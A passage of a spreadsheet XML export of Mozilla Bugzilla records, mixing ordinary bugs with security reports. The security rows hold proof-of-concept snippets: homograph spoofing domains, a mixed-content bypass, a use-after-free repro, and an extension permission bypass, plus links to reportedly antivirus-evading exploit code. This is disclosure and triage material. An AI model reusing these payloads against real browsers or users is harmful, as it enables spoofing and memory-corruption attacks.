          <t>14:45:06     INFO -  /builds/slave/rel-jamun_fx_m64_l10n_rpk-0000/build/jamun/tools/update-packaging/make_full_update.sh: line 116: ../../dist/host/bin/mar: cannot execute binary file
https://archive.mozilla.org/pub/firefox/tinderbox-builds/jamun-l10n/release-jamun_firefox_macosx64_l10n_repack-bm84-build1-build242.txt.gz
Could be related to 2 things:
1) path issues
2) the mar binary is built on linux, so we cannot execute it on mac slaves
Possible solutions:
1) cross compile mar/mbsdiff for darwin. I think this is the safest option.
2) use mar/mbsdiff binaries from tooltool. As a bandaid this can work, but it may bite use when we switch to LZMA compression.
3) build mar/mbsdiff as a part of l10n repack
4) modify release promotion to use l10n repacks from the nightly graph. This will require a lot of work and testing, but it'd be closer to the desired final state where we use in-tree scheduling for release promotion.</t>
        </is>
      </c>
      <c r="X3168" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3169">
      <c r="A3169" t="n">
        <v>217320</v>
      </c>
      <c r="B3169" t="inlineStr">
        <is>
          <t>2003-08-26 05:11:21 -0700</t>
        </is>
      </c>
      <c r="C3169" t="inlineStr">
        <is>
          <t>Update the reviewers guide for post 1.0 seamonkey + standalone products</t>
        </is>
      </c>
      <c r="D3169" t="inlineStr">
        <is>
          <t>2005-12-05 11:23:43 -0800</t>
        </is>
      </c>
      <c r="E3169" t="n">
        <v>1</v>
      </c>
      <c r="F3169" t="n">
        <v>1</v>
      </c>
      <c r="G3169" t="n">
        <v>5</v>
      </c>
      <c r="H3169" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3169" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J3169" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3169" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3169" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3169" t="inlineStr"/>
      <c r="Q3169" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3169" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3169" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3169" t="n">
        <v>1</v>
      </c>
      <c r="U3169" t="n">
        <v>0</v>
      </c>
      <c r="V3169" t="n">
        <v>5</v>
      </c>
      <c r="W3169" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5b) Gecko/20030825 Mozilla Firebird/0.6.1+
Build Identifier: 
The reviewers guide is needed in bug 216357 . Some of the material is irrelevant
now, some needs to be updated, some new material needs to be written.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X3169" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3170">
      <c r="A3170" t="n">
        <v>1402368</v>
      </c>
      <c r="B3170" t="inlineStr">
        <is>
          <t>2017-09-22 09:02:44 -0700</t>
        </is>
      </c>
      <c r="C3170" t="inlineStr">
        <is>
          <t>URL spoofing with using U+0F37 and U+0F35 Tibetan</t>
        </is>
      </c>
      <c r="D3170" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:58 -0700</t>
        </is>
      </c>
      <c r="E3170" t="n">
        <v>1</v>
      </c>
      <c r="F3170" t="n">
        <v>1</v>
      </c>
      <c r="G3170" t="n">
        <v>2</v>
      </c>
      <c r="H3170" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3170" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3170" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K3170" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3170" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3170" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3170" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3170" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3170" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3170" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3170" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T3170" t="n">
        <v>1</v>
      </c>
      <c r="U3170" t="n">
        <v>0</v>
      </c>
      <c r="V3170" t="n">
        <v>42</v>
      </c>
      <c r="W3170" t="inlineStr">
        <is>
          <t>http://xn--google-usv.com/   (U+0F37 after 'e').
http://xn--google-gsv.com/ (U+0F35 after 'e').</t>
        </is>
      </c>
      <c r="X3170" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3171">
      <c r="A3171" t="n">
        <v>1801501</v>
      </c>
      <c r="B3171" t="inlineStr">
        <is>
          <t>2022-11-19 13:02:27 -0800</t>
        </is>
      </c>
      <c r="C3171" t="inlineStr">
        <is>
          <t>Mixed content bypass using window.open'd about:blank from http context and https iframe</t>
        </is>
      </c>
      <c r="D3171" t="inlineStr">
        <is>
          <t>2024-05-30 11:02:37 -0700</t>
        </is>
      </c>
      <c r="E3171" t="n">
        <v>1</v>
      </c>
      <c r="F3171" t="n">
        <v>1</v>
      </c>
      <c r="G3171" t="n">
        <v>3</v>
      </c>
      <c r="H3171" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3171" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3171" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3171" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3171" t="inlineStr">
        <is>
          <t xml:space="preserve"> [adv-main120+][domsecurity-active][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q3171" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3171" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3171" t="inlineStr">
        <is>
          <t>120 Branch</t>
        </is>
      </c>
      <c r="T3171" t="n">
        <v>1</v>
      </c>
      <c r="U3171" t="n">
        <v>0</v>
      </c>
      <c r="V3171" t="n">
        <v>27</v>
      </c>
      <c r="W3171" t="inlineStr">
        <is>
          <t>Created attachment 9304259
index.html
Browser used: Firefox's latest version
Hi Team, 
I Just Read a disclosed Chrome Report and Seems the Same Bug affecting Firefox's Latest Version. 
https://bugs.chromium.org/p/chromium/issues/detail?id=957002 (It is possible to Frame HTTP Site from HTTPS which is not allowed and it will throw a "Mixed Content" error)
Steps to Reproduce,
1 . To demonstrate the issue, you will need 2 Websites. One with HTTP and another with HTTPS.
2.  From HTTPS, You need to Open a Javascript URI with 
`var newWin = window.open("javascript:''","_blank");`
3.  Then Call InnerHTML on `newWin` with iframe.src as HTTP Site, 
`newWin.document.body.innerHTML = "&lt;iframe src='http://testphp.vulnweb.com/login.php'&gt;"`
I have added the PoC URL and PoC.html for reference. 
Thanks, 
Godson</t>
        </is>
      </c>
      <c r="X3171" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3172">
      <c r="A3172" t="n">
        <v>1618836</v>
      </c>
      <c r="B3172" t="inlineStr">
        <is>
          <t>2020-02-28 04:48:24 -0800</t>
        </is>
      </c>
      <c r="C3172" t="inlineStr">
        <is>
          <t>Integrate the backfill logic in the PerfSheriffBot</t>
        </is>
      </c>
      <c r="D3172" t="inlineStr">
        <is>
          <t>2020-05-20 08:16:09 -0700</t>
        </is>
      </c>
      <c r="E3172" t="n">
        <v>1</v>
      </c>
      <c r="F3172" t="n">
        <v>1</v>
      </c>
      <c r="G3172" t="n">
        <v>7</v>
      </c>
      <c r="H3172" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3172" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3172" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3172" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3172" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3172" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3172" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3172" t="inlineStr"/>
      <c r="Q3172" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3172" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3172" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3172" t="n">
        <v>1</v>
      </c>
      <c r="U3172" t="n">
        <v>0</v>
      </c>
      <c r="V3172" t="n">
        <v>1</v>
      </c>
      <c r="W3172" t="inlineStr">
        <is>
          <t>This task should handle the conditions for doing the backfills.
Conditioned by a feature flag which will be disabled by default.
Updates the backfilled records from `Ready for processing` to `Backfilled`. If errors out immediately update to `Failed` instead.
Update the current hard limits and store them in MySQL.
Don’t backfill if the limits are exceeded.
Provide the appropriate test coverage.</t>
        </is>
      </c>
      <c r="X3172" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3173">
      <c r="A3173" t="n">
        <v>1592092</v>
      </c>
      <c r="B3173" t="inlineStr">
        <is>
          <t>2019-10-28 13:27:33 -0700</t>
        </is>
      </c>
      <c r="C3173" t="inlineStr">
        <is>
          <t>(H2 Goal) Learn how to conduct unmoderated remote usability studies on UserTesting</t>
        </is>
      </c>
      <c r="D3173" t="inlineStr">
        <is>
          <t>2019-12-23 13:21:19 -0800</t>
        </is>
      </c>
      <c r="E3173" t="n">
        <v>1</v>
      </c>
      <c r="F3173" t="n">
        <v>1</v>
      </c>
      <c r="G3173" t="n">
        <v>5</v>
      </c>
      <c r="H3173" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3173" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J3173" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K3173" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3173" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3173" t="inlineStr"/>
      <c r="Q3173" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3173" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3173" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3173" t="n">
        <v>1</v>
      </c>
      <c r="U3173" t="n">
        <v>0</v>
      </c>
      <c r="V3173" t="n">
        <v>1</v>
      </c>
      <c r="W3173" t="inlineStr">
        <is>
          <t>**Request Description** 
Learn how to conduct unmoderated remote usability studies on UserTesting
**Deadline** 
End of H2 2019
**Priority Level** 
2
**Priority Level Description** 
The UR team often supports UX team members to run usability studies in UserTesting.  
Related to the team H2 goal:  Contribute to a higher performing mixed-method user research capability in Firefox
**Supporting Information**
UR Team OKRs:  https://docs.google.com/document/d/1AkjYr20BFhH_iseiRQ4jt1QSC5zJ7ZnLp0asBe6mqXM/edit#</t>
        </is>
      </c>
      <c r="X3173" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3174">
      <c r="A3174" t="n">
        <v>515376</v>
      </c>
      <c r="B3174" t="inlineStr">
        <is>
          <t>2009-09-09 08:20:47 -0700</t>
        </is>
      </c>
      <c r="C3174" t="inlineStr">
        <is>
          <t>missing index validation in dirac.c:dirac_parse_info()</t>
        </is>
      </c>
      <c r="D3174" t="inlineStr">
        <is>
          <t>2010-01-08 11:36:53 -0800</t>
        </is>
      </c>
      <c r="E3174" t="n">
        <v>1</v>
      </c>
      <c r="F3174" t="n">
        <v>1</v>
      </c>
      <c r="G3174" t="n">
        <v>3</v>
      </c>
      <c r="H3174" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3174" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3174" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3174" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3174" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3174" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3174" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3174" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q3174" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3174" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3174" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3174" t="n">
        <v>1</v>
      </c>
      <c r="U3174" t="n">
        <v>0</v>
      </c>
      <c r="V3174" t="n">
        <v>20</v>
      </c>
      <c r="W3174" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/media/liboggz/src/liboggz/dirac.c#153
153   info-&gt;video_format = video_format = dirac_uint( &amp;bs ); /* index */
154 
155   info-&gt;width = dirac_fsize_tbl[video_format].width;
156   info-&gt;height = dirac_fsize_tbl[video_format].height;
|dirac_uint| seems to return int32 without any bound checking so using it as index potentially may read memory or cause a crash.
can't hit the code yet.</t>
        </is>
      </c>
      <c r="X3174" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3175">
      <c r="A3175" t="n">
        <v>1088635</v>
      </c>
      <c r="B3175" t="inlineStr">
        <is>
          <t>2014-10-24 05:35:10 -0700</t>
        </is>
      </c>
      <c r="C3175" t="inlineStr">
        <is>
          <t>1410H - Firefox 32,33 xul.dll!nsHtml5TreeOperation use-after-free (poisoned)</t>
        </is>
      </c>
      <c r="D3175" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:54 -0700</t>
        </is>
      </c>
      <c r="E3175" t="n">
        <v>1</v>
      </c>
      <c r="F3175" t="n">
        <v>1</v>
      </c>
      <c r="G3175" t="n">
        <v>3</v>
      </c>
      <c r="H3175" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3175" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3175" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K3175" t="inlineStr">
        <is>
          <t>33 Branch</t>
        </is>
      </c>
      <c r="L3175" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3175" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N3175" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3175" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q3175" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3175" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3175" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T3175" t="n">
        <v>1</v>
      </c>
      <c r="U3175" t="n">
        <v>0</v>
      </c>
      <c r="V3175" t="n">
        <v>35</v>
      </c>
      <c r="W3175" t="inlineStr">
        <is>
          <t>Created attachment 8511025
repro.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Build ID: 20141011015303
Steps to reproduce:
&lt;script&gt;
  window.onload = function() {
    oMenuElement = document.createElement("MENU");
    document.open();
    document.insertBefore(oMenuElement, null);
    document.write("&lt;script&gt;&lt;/"+"script&gt;\n");
  };
&lt;/script&gt;
Actual results:
Access Violation around 0x5a5a5a5a
Expected results:
Synopsis
--------
Firefox can be made to use data from a freed and poisoned object through
specially crafted HTML, resulting in access violations around address
0x5a5a5a5a in x66 systems.
Known affected versions
-----------------------
  + Mozilla Firefox 32 &amp; 33
    (other versions not tested)
Attack vectors
--------------
  * Mozilla Firefox 32 &amp; 33
    An attacker would need to get a target user to open a specially crafted
    webpage.
Mitigations
-----------
  * Mozilla Firefox 32 &amp; 33
    Disabling JavaScript should prevent an attacker from triggering the
    vulnerable code path.
Description
-----------
The repro causes the nsHtml5TreeOperation's mOne member object to be freed. The
freed memory is not released, but poisoned by filling it with "z" (0x5a). A
pointer to the freed object is kept in mOne and  continues to be used. The repro
causes xul!nsHtml5TreeOperation::Perform to pass the "node" member of mOne to
xul!nsHtml5TreeOperation::AppendText as a pointer to an object, but the pointer
is 0x5a5a5a5a and this will cause an access violation.
http://lxr.mozilla.org/mozilla-central/source/parser/html/nsHtml5TreeOperation.cpp#687
Exploit
-------
I am not sure if this is exploitable, as I am not familiar with the heap
management and mitigations (such as poisoning) of Firefox. I am reporting this
as a security issue in case the poisoning is temporarily and the object can get
released and reused, or in case a heap spray could allocate memory at the
address 0x5a5a5a5a.</t>
        </is>
      </c>
      <c r="X3175" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3176">
      <c r="A3176" t="n">
        <v>1487478</v>
      </c>
      <c r="B3176" t="inlineStr">
        <is>
          <t>2018-08-30 10:49:27 -0700</t>
        </is>
      </c>
      <c r="C3176" t="inlineStr">
        <is>
          <t>"file:///*" extension permission has no warning</t>
        </is>
      </c>
      <c r="D3176" t="inlineStr">
        <is>
          <t>2020-02-16 17:40:02 -0800</t>
        </is>
      </c>
      <c r="E3176" t="n">
        <v>1</v>
      </c>
      <c r="F3176" t="n">
        <v>1</v>
      </c>
      <c r="G3176" t="n">
        <v>3</v>
      </c>
      <c r="H3176" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3176" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J3176" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3176" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3176" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3176" t="inlineStr">
        <is>
          <t>[adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q3176" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3176" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3176" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T3176" t="n">
        <v>1</v>
      </c>
      <c r="U3176" t="n">
        <v>0</v>
      </c>
      <c r="V3176" t="n">
        <v>22</v>
      </c>
      <c r="W3176" t="inlineStr">
        <is>
          <t>Created attachment 9005272
file-perm-nowarning.xpi
When an extension requests the "file:///*" permission, it gets access to local files, but there are no permission warnings (unlike "file://*/*", which has the "Access your data for all websites" warning).
1. Visit about:config and set xpinstall.signatures.required to false (requires Nightly or unbranded build).
2. Install the attached xpi file.
3. Visit a local file or directory in the browser.
Expected:
- At step 2, a warning should be displayed about the fact that extensions can access local files.
- At step 3, the local file should have a pink background (=extension ran script in the file).
(alternatively, depending on the resolution of bug 1487353, the local file should not be pink, and the warning at step 2 is not relevant)
Actual:
- At step 2, no warnings are displayed.</t>
        </is>
      </c>
      <c r="X3176" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3177">
      <c r="A3177" t="n">
        <v>491097</v>
      </c>
      <c r="B3177" t="inlineStr">
        <is>
          <t>2009-05-01 18:02:47 -0700</t>
        </is>
      </c>
      <c r="C3177" t="inlineStr">
        <is>
          <t>website: on homepage, unbold [#] of active daily users under featured personas</t>
        </is>
      </c>
      <c r="D3177" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E3177" t="n">
        <v>1</v>
      </c>
      <c r="F3177" t="n">
        <v>1</v>
      </c>
      <c r="G3177" t="n">
        <v>6</v>
      </c>
      <c r="H3177" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3177" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J3177" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K3177" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3177" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3177" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3177" t="inlineStr"/>
      <c r="Q3177" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3177" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3177" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="T3177" t="n">
        <v>1</v>
      </c>
      <c r="U3177" t="n">
        <v>0</v>
      </c>
      <c r="V3177" t="n">
        <v>4</v>
      </c>
      <c r="W3177" t="inlineStr">
        <is>
          <t>please unbold the number of active daily personas underneath the "featured personas" section to keep consistency with right side of the homepage.</t>
        </is>
      </c>
      <c r="X3177" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3178">
      <c r="A3178" t="n">
        <v>606997</v>
      </c>
      <c r="B3178" t="inlineStr">
        <is>
          <t>2010-10-25 10:13:34 -0700</t>
        </is>
      </c>
      <c r="C3178" t="inlineStr">
        <is>
          <t>Crash with document.write marquee loop (JS:ShellCode-FG Exploit)</t>
        </is>
      </c>
      <c r="D3178" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:38 -0700</t>
        </is>
      </c>
      <c r="E3178" t="n">
        <v>1</v>
      </c>
      <c r="F3178" t="n">
        <v>1</v>
      </c>
      <c r="G3178" t="n">
        <v>3</v>
      </c>
      <c r="H3178" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3178" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3178" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3178" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3178" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3178" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3178" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3178" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P3178" t="inlineStr">
        <is>
          <t>embargo until 2011-03-01[sg:vector-critical linux][sg:dos oom][have workaround for a Pango bug in OOM situations][hardblocker][has patch]</t>
        </is>
      </c>
      <c r="Q3178" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3178" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3178" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3178" t="n">
        <v>1</v>
      </c>
      <c r="U3178" t="n">
        <v>0</v>
      </c>
      <c r="V3178" t="n">
        <v>72</v>
      </c>
      <c r="W3178" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 GTB7.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 GTB7.1
I'm from Poland
I do not know English.
I'll write in Polish.
Old version  not by me, detect antywius JS:ShellCode-FG [Exploit]
http://pastebin.com/Dpd56jvw
My vwerion RIP not detect antivirus 
http://pastebin.com/YrhzMCEG
Bawiłem się kodami vbs malware i wykorzystałem do maskowania kodu.
Gdyby nie zachęta w postaci nagrody to bym nie napisał jak by nie było to krytyczny błąd, js za dużo może od strony użytkownika niestety.
Ale lubię programować jako tako więc postanowiłem się podzielić. 
Jedyna odporna przeglądarka która znam to google chrome.
Osobiście wole Mozillę za szereg wtyczek które ubóstwiam.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3178" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3179">
      <c r="A3179" t="n">
        <v>468532</v>
      </c>
      <c r="B3179" t="inlineStr">
        <is>
          <t>2008-12-08 15:56:06 -0800</t>
        </is>
      </c>
      <c r="C3179" t="inlineStr">
        <is>
          <t>Trusted CA trust flags not being honored in CERT_VerifyCert</t>
        </is>
      </c>
      <c r="D3179" t="inlineStr">
        <is>
          <t>2009-02-08 23:52:40 -0800</t>
        </is>
      </c>
      <c r="E3179" t="n">
        <v>1</v>
      </c>
      <c r="F3179" t="n">
        <v>1</v>
      </c>
      <c r="G3179" t="n">
        <v>3</v>
      </c>
      <c r="H3179" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3179" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3179" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3179" t="inlineStr">
        <is>
          <t>3.12</t>
        </is>
      </c>
      <c r="L3179" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3179" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3179" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3179" t="inlineStr">
        <is>
          <t>SUN_MUST_HAVE</t>
        </is>
      </c>
      <c r="Q3179" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3179" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3179" t="inlineStr">
        <is>
          <t>3.12.3</t>
        </is>
      </c>
      <c r="T3179" t="n">
        <v>1</v>
      </c>
      <c r="U3179" t="n">
        <v>0</v>
      </c>
      <c r="V3179" t="n">
        <v>15</v>
      </c>
      <c r="W3179" t="inlineStr">
        <is>
          <t>NSS 3.12 is not honoring the 'C' flag on certs in the certDB which doing a
cert chain validation with the old CERT_VerifyCertChain code.  
The 'C' flag (TRUSTED CA) should force any cert to be treated as a valid 
and trusted CA cert, regardless of whether it has a BasicConstraints 
extension or not, and regardless of whether it is X.509 v1 or v3.  
It is not having that effect in NSS 3.12.  It seems to work OK in NSS 3.11.
A simple reproducible test script shows this.  It creates an X.509 v3 cert
without any extensions, sets the 'C' flag on it, and uses it like a CA 
cert to issue a subordinate cert.  However, the attempt to validate the 
subordinate cert fails, reporting unknown issuer, because the cert is not 
recognized as a CA cert, despite having the flag set.  
echo passwd &gt; pwfile
echo jfgdfgkjdflfdgopgpjergerpojggjgi54kgojgh-rt9-i-uy=50i5pgoj5r &gt; noise
mkdir -p DB
certutil -N -d DB -f pwfile
# Create a self-signed certificate to act as CA
certutil -S -d DB -n test_ca -s cn=test_ca -x -t CT,, -f pwfile -z noise
# Generate a server certificate using that trusted CA
certutil -S -d DB -n test -s cn=test -c test_ca -t ,, -f pwfile -z noise
# List the created certificates
certutil -L -d DB
# Attempt to validate the certificate
certutil -V -d DB -n test -e -u V -f pwfile
(CR 6782276)</t>
        </is>
      </c>
      <c r="X3179" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3180">
      <c r="A3180" t="n">
        <v>554354</v>
      </c>
      <c r="B3180" t="inlineStr">
        <is>
          <t>2010-03-23 09:53:25 -0700</t>
        </is>
      </c>
      <c r="C3180" t="inlineStr">
        <is>
          <t>Evil TLS Server can crash all Firefox from (at least) 3.0 ~ 3.6 (windows + linux)</t>
        </is>
      </c>
      <c r="D3180" t="inlineStr">
        <is>
          <t>2010-10-21 23:08:17 -0700</t>
        </is>
      </c>
      <c r="E3180" t="n">
        <v>1</v>
      </c>
